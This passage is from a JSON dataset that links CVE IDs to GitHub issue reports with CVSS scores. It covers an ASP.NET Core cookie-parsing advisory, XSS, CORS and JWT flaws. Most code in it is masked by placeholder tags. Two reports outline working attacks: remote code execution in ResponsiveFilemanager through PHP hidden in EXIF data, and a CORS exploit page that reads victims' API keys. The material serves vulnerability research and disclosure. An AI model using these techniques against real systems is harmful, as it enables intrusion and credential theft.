  46002. "description": "Microsoft Security Advisory CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability. Microsoft Security Advisory CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A security feature bypass vulnerability exists in the way Microsoft ASP.NET Core parses encoded cookie names. The ASP.NET Core cookie parser decodes entire cookie strings which could allow a malicious attacker to set a second cookie with the name being percent encoded. The security update addresses the vulnerability by fixing the way the ASP.NET Core cookie parser handles encoded names. Discussion Discussion for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  46003. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  46004. "severity": "HIGH",
  46005. "baseScore": 7.5,
  46006. "impactScore": 3.6,
  46007. "exploitabilityScore": 3.9
  46008. },
  46009. {
  46010. "CVE_ID": "CVE-2020-1045",
  46011. "Issue_Url_old": "https://github.com/dotnet/aspnetcore/issues/25701",
  46012. "Issue_Url_new": "https://github.com/dotnet/aspnetcore/issues/25701",
  46013. "Repo_new": "dotnet/aspnetcore",
  46014. "Issue_Created_At": "2020-09-08T18:12:34Z",
  46015. "description": "Microsoft Security Advisory CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability. Microsoft Security Advisory CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A security feature bypass vulnerability exists in the way Microsoft ASP.NET Core parses encoded cookie names. The ASP.NET Core cookie parser decodes entire cookie strings which could allow a malicious attacker to set a second cookie with the name being percent encoded. The security update addresses the vulnerability by fixing the way the ASP.NET Core cookie parser handles encoded names. Announcement Announcement for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  46016. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  46017. "severity": "HIGH",
  46018. "baseScore": 7.5,
  46019. "impactScore": 3.6,
  46020. "exploitabilityScore": 3.9
  46021. },
  46022. {
  46023. "CVE_ID": "CVE-2020-1045",
  46024. "Issue_Url_old": "https://github.com/github/advisory-database/issues/302",
  46025. "Issue_Url_new": "https://github.com/github/advisory-database/issues/302",
  46026. "Repo_new": "github/advisory-database",
  46027. "Issue_Created_At": "2022-05-19T19:16:56Z",
  46028. "description": ".NET / ASP .NET CVEs package vulnerabilities backfill. Hi team! We would like to backfill to the DB APITAG package vulnerabilities for NUMBERTAG The list of vulnerabilities below are for .NET and ASP.NET Microsoft packages. Those already have CVEs and the impacted packages were specified in announcements published with each CVE in the .NET / ASP.NET Announcement repositories ( URLTAG , URLTAG Please let me know if additional details are needed. //cc MENTIONTAG , MENTIONTAG MENTIONTAG CVE | Title | Announcement date | CVE URL | Announcement URL | Impacted software | Vulnerable package id | Vulnerable version range | Fixed in version | | | | | | | | CVETAG | Open Redirect can cause Elevation Of Privilege | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG APITAG NUMBERTAG CVETAG | Open Redirect can cause Elevation Of Privilege | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial Of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | CORS bypass can enable Information Disclosure | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | CORS bypass can enable Information Disclosure | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | CORS bypass can enable Information Disclosure | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | CORS bypass can enable Information Disclosure | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Security Feature Bypass in NUMBERTAG Certificate Validation | PATHTAG | CVETAG | URLTAG | WCF packages for .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | Denial of Service Vulnerability in Odata | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Denial of Service Vulnerability in Odata | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Denial of Service Vulnerability in Odata | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Denial of Service Vulnerability in Odata | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | .NET Core Tampering Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Information Disclosure Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Information Disclosure Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Information Disclosure Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG | ? | ? CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Domain Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Domain Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Domain Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core and ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | .NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core and ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Spoofing Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core NUMBERTAG and NUMBERTAG APITAG NUMBERTAG CVETAG | ASP.NET Core Elevation Of Privilege Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Elevation Of Privilege Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Denial of Service Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | ASP.NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | .NET Core Remote Code Execution Vulnerability | PATHTAG | CVETAG | URLTAG | .NET Core | APITAG NUMBERTAG CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG CVETAG | Microsoft ASP.NET Core Security Feature Bypass Vulnerability | PATHTAG | CVETAG | URLTAG | ASP.NET Core | APITAG NUMBERTAG",
  46029. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  46030. "severity": "HIGH",
  46031. "baseScore": 7.5,
  46032. "impactScore": 3.6,
  46033. "exploitabilityScore": 3.9
  46034. },
  46035. {
  46036. "CVE_ID": "CVE-2020-10544",
  46037. "Issue_Url_old": "https://github.com/primefaces/primefaces/issues/5642",
  46038. "Issue_Url_new": "https://github.com/primefaces/primefaces/issues/5642",
  46039. "Repo_new": "primefaces/primefaces",
  46040. "Issue_Created_At": "2020-03-04T12:09:20Z",
  46041. "description": "tooltip: XSS in target title NUMBERTAG Environment APITAG version NUMBERTAG Does it work on the newest released APITAG version? No Does it work on the newest sources in APITAG No Affected browsers: all NUMBERTAG Expected behavior Proper escaping of title referenced by p:tooltip for NUMBERTAG Actual behavior Target title not escaped in FILETAG if APITAG is set in FILETAG NUMBERTAG Steps to reproduce NUMBERTAG Sample XHTML APITAG APITAG NUMBERTAG Sample bean NUMBERTAG Solution This error was fixed for the APITAG function in FILETAG with NUMBERTAG Same solution should be applied to Function APITAG The line APITAG = APITAG === undefined) ? true : APITAG must be added at top of APITAG",
  46042. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46043. "severity": "MEDIUM",
  46044. "baseScore": 6.1,
  46045. "impactScore": 2.7,
  46046. "exploitabilityScore": 2.8
  46047. },
  46048. {
  46049. "CVE_ID": "CVE-2020-10567",
  46050. "Issue_Url_old": "https://github.com/trippo/ResponsiveFilemanager/issues/600",
  46051. "Issue_Url_new": "https://github.com/trippo/responsivefilemanager/issues/600",
  46052. "Repo_new": "trippo/responsivefilemanager",
  46053. "Issue_Created_At": "2020-03-13T20:06:55Z",
  46054. "description": "remote code execution vulnerability FILETAG in save_img action because of no validation on extension name.. after taking another look at your application i noticed in the FILETAG file in the \"save_img\" action that the \"name\" parameter doesn't validate the extension of the file. this makes it possible to upload php files to the server even when this normaly should not be allowed. there was a miner validation to check if the data from the \"url\" parameter started with \"data:image/jpeg;base NUMBERTAG and that the base NUMBERTAG encoded image is a valid image. a simple work arround to bypass this check is to upload a valid jpeg image, but that inside of exif data a php tag is send. this makes it possible to send php code and that the extension becomes php what let to remote code execution. As poc i will send a normal image where the base NUMBERTAG encoded image contains APITAG as php code. here is a simple javascript POC that will send a POST request to the page \" URLTAG \" where the \"path\" parameters is empty, the url contains my image with phpinfo in the exif data and the name is set to FILETAG . you will need to change the ip and port to your webserver and this code has to be runned on the filemanagers FILETAG page, because the session is validated and by running the code from the dialog page than the session is set and you won't get error's. if you run this command from the browsers console in the dialog page than a new file would be created in the /source/ folder called FILETAG . ( UPLOAD_DIR ) than just go to \" FILETAG \" and you will see the APITAG code executed. ERRORTAG here a copy of the burp request: CODETAG and here a copy of the image urldecoded: ERRORTAG A CVE has been requested and a potential fast patch is to dissable save_img in the config file.",
  46055. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46056. "severity": "CRITICAL",
  46057. "baseScore": 9.8,
  46058. "impactScore": 5.9,
  46059. "exploitabilityScore": 3.9
  46060. },
  46061. {
  46062. "CVE_ID": "CVE-2020-10591",
  46063. "Issue_Url_old": "https://github.com/walmartlabs/concord/issues/22",
  46064. "Issue_Url_new": "https://github.com/walmartlabs/concord/issues/22",
  46065. "Repo_new": "walmartlabs/concord",
  46066. "Issue_Created_At": "2020-03-11T16:35:13Z",
  46067. "description": "Misconfigured CORS allows a malicious user to fetch api keys. Just a security issue I noticed where the accepted origins on CORS appear to be vulnerable. If an authenticated user visits a page such as the following, the VICTIMSKEY is alerted. This could also be sent to an attacker. ` APITAG APITAG APITAG APITAG function APITAG { var xhttp = new APITAG APITAG = APITAG { if APITAG NUMBERTAG APITAG NUMBERTAG APITAG = APITAG } }; APITAG \" URLTAG \", true); APITAG = true; APITAG } APITAG APITAG APITAG APITAG APITAG CORS APITAG Exploit APITAG APITAG full content of page APITAG APITAG APITAG Exploit APITAG APITAG APITAG APITAG",
  46068. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  46069. "severity": "HIGH",
  46070. "baseScore": 7.5,
  46071. "impactScore": 3.6,
  46072. "exploitabilityScore": 3.9
  46073. },
  46074. {
  46075. "CVE_ID": "CVE-2020-10594",
  46076. "Issue_Url_old": "https://github.com/Styria-Digital/django-rest-framework-jwt/issues/36",
  46077. "Issue_Url_new": "https://github.com/styria-digital/django-rest-framework-jwt/issues/36",
  46078. "Repo_new": "styria-digital/django-rest-framework-jwt",
  46079. "Issue_Created_At": "2020-03-02T20:17:34Z",
  46080. "description": "Blacklisted tokens can still be refreshed. If you configure an app to allow blacklisting tokens and turn APITAG on, then you can still operate the refresh endpoint using a blacklisted token, which allows you to side step the fact that the token is invalidated.",
  46081. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  46082. "severity": "CRITICAL",
  46083. "baseScore": 9.1,
  46084. "impactScore": 5.2,
  46085. "exploitabilityScore": 3.9
  46086. },
  46087. {
  46088. "CVE_ID": "CVE-2020-10594",
  46089. "Issue_Url_old": "https://github.com/jpadilla/django-rest-framework-jwt/issues/484",
  46090. "Issue_Url_new": "https://github.com/jpadilla/django-rest-framework-jwt/issues/484",
  46091. "Repo_new": "jpadilla/django-rest-framework-jwt",
  46092. "Issue_Created_At": "2019-07-08T11:01:47Z",
  46093. "description": "Status. Hello there, For a long time now I've honestly thought I'd have the time and energy to come back and work on this project, and I think I still don't. I've not worked on any project recently needing it, which makes it harder to find time to come back. At some point I also noticed I no longer liked how the project had evolved and that it deserved a fair redesign and there are a few fundamental changes required. Now I'm certain that I wouldn't be able to work on this with the care required for a major version bump. I'm definitely not proud at how long it has taken me to make this or any update, I recognize that and I'm sorry for not having spoken out sooner. There's two efforts/projects that I'd like to point out to: Fork: URLTAG Drop in updated replacement fork. I'm willing to transfer repo, pypi, etc, to keep this going. Alternative: URLTAG Many of the changes that I've wanted to work on are already done here. This is what I would probably use today. Learned quite a few things from this. Thanks to everyone, including past collaborators and contributors. \u2764\ufe0f",
  46094. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  46095. "severity": "CRITICAL",
  46096. "baseScore": 9.1,
  46097. "impactScore": 5.2,
  46098. "exploitabilityScore": 3.9
  46099. },
  46100. {
  46101. "CVE_ID": "CVE-2020-10596",
  46102. "Issue_Url_old": "https://github.com/opencart/opencart/issues/7810",
  46103. "Issue_Url_new": "https://github.com/opencart/opencart/issues/7810",
  46104. "Repo_new": "opencart/opencart",
  46105. "Issue_Created_At": "2020-01-09T04:23:52Z",
